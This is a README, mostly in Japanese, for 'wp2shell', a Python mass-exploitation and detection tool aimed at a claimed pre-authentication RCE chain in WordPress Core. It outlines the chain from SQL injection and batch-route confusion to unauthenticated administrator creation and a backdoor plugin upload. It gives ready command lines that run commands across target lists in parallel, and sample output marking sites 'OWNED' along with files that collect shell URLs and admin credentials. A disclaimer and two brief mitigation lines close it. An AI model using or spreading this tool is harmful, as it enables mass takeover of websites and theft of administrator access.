
WordPress Coreの認証前RCEチェーンCVE-2026-63030およびCVE-2026-60137(SQLインジェクションからリモートコード実行への連鎖)に対応するPython製のマスエクスプロイトおよび検出ツール。
| 属性 | 詳細 |
|---|---|
| CVE ID | CVE-2026-63030 (+ CVE-2026-60137) |
| チェーン | wp2shell — 認証前 RCE |
| 深刻度 | 🔴 CRITICAL (CVSS 9.8) |
| 対象 | WordPress Core(プラグイン不要) |
| 影響を受けるバージョン (RCE) | 6.9.0 – 6.9.4 および 7.0.0 – 7.0.1 |
| 影響を受けるバージョン (SQLi のみ) | 6.8.0 – 6.8.5 |
| 修正済み | 6.8.6 / 6.9.5 / 7.0.2 (2026/07/18) |
| 必要な認証 | なし |
WordPress コアにおける 2 つの連鎖した脆弱性:
WP_Query の author__not_in パラメータにおける SQL インジェクション。/wp-json/batch/v1 がバッチエントリを同期させず、リクエストが次のルートに「流れ込む」。このチェーンは SQLi を 認証前 RCE に変換する:
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
│ │
└──────────────┬─────────────────────┘
▼
UNION fake-post + oEmbed + changeset poisoning
▼
POST /wp/v2/users (roles: administrator) ← admin criado sem auth
▼
login → upload plugin backdoor → RCE
フォールバック: 直接 INTO OUTFILE(FILE 権限)およびブラインドハッシュ抽出 + クラック。
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
| オプション | 説明 |
|---|---|
-l, --targets-file | 1 行につき 1 ターゲット(繰り返し指定可能、上限なし) |
-u, --target | 単一ターゲット |
--cmd | ターゲット上で実行するコマンド |
--authorized | 必須(または WP2SHELL_AUTHORIZED=1) |
-c, --concurrency | 並列ターゲット数 (1–32) |
--delay | タイミング/抽出の SLEEP (2 = 堅牢) |
--rate | ターゲットあたりのリクエスト/秒 |
-k, --insecure | TLS を無視 |
--proxy | HTTP プロキシ |
--wordlist / --password / --username | 認証情報フォールバック |
--log / --owned / --results-csv | 出力ファイル |
[+] [14:22:31] https://target.com OWNED ✓1 ~0 ✗10
[~] [14:22:32] https://other.com ADMIN ✓1 ~1 ✗10
---- SUMMARY ----
[+] owned=1 [~] admin=1 [-] fail=10 [.] error=0
owned.txt — RCE に成功したターゲット(シェル URL)admins.txt — RCE シンクなしで作成された管理者(認証情報)exploit_log.txt — ターゲットごとの詳細results.csv — サマリー(exit_code: 0=owned, 4=admin, 2=fail, 3=error)whl_page)+ 一般的なスラッグ├── wp2shell.py # exploit + detector
├── targets.txt # alvos (uma URL por linha)
├── owned.txt # RCE conseguido (auto-criado)
├── admins.txt # admins criados (auto-criado)
└── README.md
╔══════════════════════════════════════════════════════════════════╗
║ LEGAL DISCLAIMER ║
╠══════════════════════════════════════════════════════════════════╣
║ This tool is provided for EDUCATIONAL and AUTHORIZED ║
║ SECURITY TESTING purposes only. ║
║ Only use on systems you own or have explicit permission. ║
║ The author is NOT responsible for any misuse or damage. ║
╚══════════════════════════════════════════════════════════════════╝
/wp-json/batch/v1 および /?rest_route=/batch/v1 への未認証 POST をブロックするwp-content/uploads/ および wp-content/plugins/ 内の不審な PHP を監査する